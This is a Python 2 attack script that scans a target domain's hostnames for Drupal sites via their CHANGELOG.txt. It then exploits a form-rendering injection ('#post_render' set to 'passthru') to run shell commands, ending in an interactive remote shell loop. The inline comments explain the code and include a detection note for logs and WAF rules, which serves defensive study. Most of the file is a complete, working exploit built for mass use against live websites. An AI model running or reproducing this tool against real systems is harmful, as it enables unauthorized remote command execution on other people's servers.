#!/usr/bin/env python
import requests,time,sys,re
# Authors:
# - batinihani ~ https://github.com/batininhani/
# - alpereneymen ~ https://github.com/alpereneymen/
class bcolors:
    """ANSI escape sequences used to colour the script's terminal output."""

    # Foreground colours
    HEADER = "\033[95m"
    OKBLUE = "\033[94m"
    OKGREEN = "\033[92m"
    WARNING = "\033[93m"
    FAIL = "\033[91m"
    # Text attributes
    BOLD = "\033[1m"
    UNDERLINE = "\033[4m"
    # Reset all attributes back to the terminal default
    ENDC = "\033[0m"
def exploit(HOST,cmq):
    # Issue the two POST requests this script uses against a Drupal form
    # endpoint and leave the last response in the module-level global ``r``;
    # callers read ``r.text`` afterwards, nothing is returned.
    #
    # HOST: base URL the requests are sent to (the Drupal path goes in ``q``).
    # cmq:  command text, already single-quoted by the caller, which is
    #       wrapped in a second pair of single quotes here and placed in the
    #       ``name[#markup]`` query parameter next to a
    #       ``name[#post_render][]=passthru`` entry.
    #
    # Detection note: the ``#post_render``, ``#markup`` and ``#type`` keys and
    # the ``file/ajax/name/#value/<id>`` path appear literally in the query
    # string of these requests, so the pattern is matchable in web-server
    # access logs or a WAF rule without inspecting the POST body.
    global r
    # First request: the password-reset form with the injected element.
    get_params = {'q': 'user/password', 'name[#post_render][]': 'passthru', 'name[#markup]': "'"+cmq+"'",'name[#type]': 'markup'}
    post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name'}
    r = requests.post(HOST, data=post_params, params=get_params)
    # Pull the form_build_id embedded in the returned HTML; the regex is tied
    # to this exact markup, so any other layout yields None and the second
    # request is skipped (``r`` then still holds the first response).
    m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
    if m:
        found = m.group(1)
        # Second request: replay that form_build_id through the file/ajax path.
        get_params = {'q': 'file/ajax/name/#value/' + found}
        post_params = {'form_build_id': found}
        r = requests.post(HOST, data=post_params, params=get_params)
def get_version(url):
    # Fetch ``url`` (the caller passes a ``/CHANGELOG.txt`` URL) and, if the
    # body mentions Drupal, print the version token and offer an interactive
    # exploit attempt against the same host.
    #
    # url: full URL to request. The bare hostname used to build the exploit
    #      URL comes from the module-level loop variable ``host``, not from
    #      ``url``, so this function only works when called from that loop.
    #
    # Only the requests exceptions listed in the except clauses are handled;
    # IndexError/ValueError raised while slicing the responses (see notes
    # below) propagate and abort the whole script.
    try:
        # The module-level proxyDict is not passed here, so this request and
        # the ones made by exploit() are sent without the configured proxy.
        response = requests.get(url, timeout=2, headers={
            'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13'})
        contents = response.text
        if "Drupal" in contents:
            # Second whitespace-separated token of the body, presumably the
            # version number; raises IndexError if there are fewer than two.
            splitted = contents.split()
            print " {} [+] {} Version : {} {}\n".format(bcolors.OKGREEN,url,splitted[1].replace(",",""),bcolors.ENDC)
            okno = raw_input("Do you want try exploit ? [Y/n] -> ")
            if okno == "Y" or okno == "y":
                # Re-prompt until the answer is http or https (either case).
                while True:
                    http_https = raw_input(bcolors.OKGREEN + "HTTP / HTTPS ? -> " + bcolors.ENDC)
                    if http_https == "http" or http_https == "HTTP":
                        http_https = "http://"
                        break
                    elif http_https == "https" or http_https == "HTTPS":
                        http_https = "https://"
                        break
                    else:
                        continue
                # Any answer other than the literal "www" adds no prefix.
                www_ask = raw_input(bcolors.OKGREEN+"If it's not subdomain put 'www' -> "+bcolors.ENDC)
                if www_ask == "www":
                    www_ask = "www"
                else:
                    www_ask = ""
                HOST = http_https + www_ask + host + "/"
                # Probe command; success is judged by the first line of the
                # response echoing the marker back.
                echo = "'echo w00t!'"
                exploit(HOST, echo)
                # ``r`` is the global set by exploit(); splitlines()[0] raises
                # IndexError on an empty response body.
                if r.text.splitlines()[0] == "w00t!":
                    print("\n"+bcolors.OKGREEN+"YOU GOT A SHELL!! "+bcolors.ENDC+"\n")
                    time.sleep(2.0)
                    # Interactive loop: each line is single-quoted and sent
                    # through exploit(); "quit" or "q" leaves the loop.
                    while True:
                        cmq = raw_input('\033[1;31mshell > \033[1;m')
                        if cmq == "quit" or cmq == "q":
                            break
                        else:
                            cmq = "'%s'" %cmq
                            exploit(HOST, cmq)
                            # index("")+len("") is always 0, so this prints
                            # r.text from the start up to the first "[{";
                            # ValueError if "[{" is absent from the body.
                            print r.text[(r.text.index("")+len("")):r.text.index("[{")]
                else:
                    print "[i]Not Exploitable!\n"
        pass
    except requests.exceptions.InvalidURL:
        print "\n[i] Done!"
    except (requests.ConnectionError,requests.ReadTimeout,requests.TooManyRedirects):
        # Unreachable or slow hosts are skipped silently after a short pause.
        time.sleep(0.1)
# Interactive entry point. This runs at import time (no __main__ guard):
# ask for a target, optionally a proxy, enumerate hostnames through a
# third-party lookup service, then check each one with get_version().
target = raw_input(bcolors.OKGREEN + "Target :" + bcolors.ENDC)
# Optional proxy entered as IP and port; any answer other than Y/y means none.
yn = raw_input(bcolors.WARNING + "Do you want use proxy ?" + bcolors.BOLD + "[Y/N] :" + bcolors.ENDC)
if yn == "Y" or yn =="y":
    p_ip = raw_input(bcolors.OKGREEN + "IP :" + bcolors.ENDC)
    p_port = raw_input(bcolors.OKGREEN + "PORT :" + bcolors.ENDC)
    p_full = p_ip + ":" + p_port
else:
    p_full = "" # Change Proxy
http_proxy = p_full
# Only the "http" scheme is mapped. This dict is passed solely to the
# hostsearch request below; get_version() and exploit() do not use it.
proxyDict = {"http": http_proxy}
# The raw target string is concatenated into the query without URL-encoding
# and sent to an external service, so the target is disclosed to that third
# party. The reply is presumably one "host,ip" line per result (inferred from
# the split below).
hostsearch = "http://api.hackertarget.com/hostsearch/?q=" + target
response = requests.get(hostsearch, headers={
    'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13'},
    proxies=proxyDict)
hosts_ips = response.text
if "error check your search parameter" in hosts_ips:
    # The service answered with its error text instead of results.
    sys.exit("Change Proxy!")
else:
    # Keep the first comma-separated field of every line. A trailing empty
    # line produces an empty host string, which get_version() then receives
    # as "http:///CHANGELOG.txt".
    content = hosts_ips.split("\n")
    result = []
    for line in content:
        result.append(line.split(',')[0])
    # ``host`` is also read as a module-level global inside get_version()
    # when it builds the exploit URL, so the loop variable name matters.
    for host in result:
        print ("[i]" + host + "-> CHECKING..")
        get_version("http://" + host + "/CHANGELOG.txt")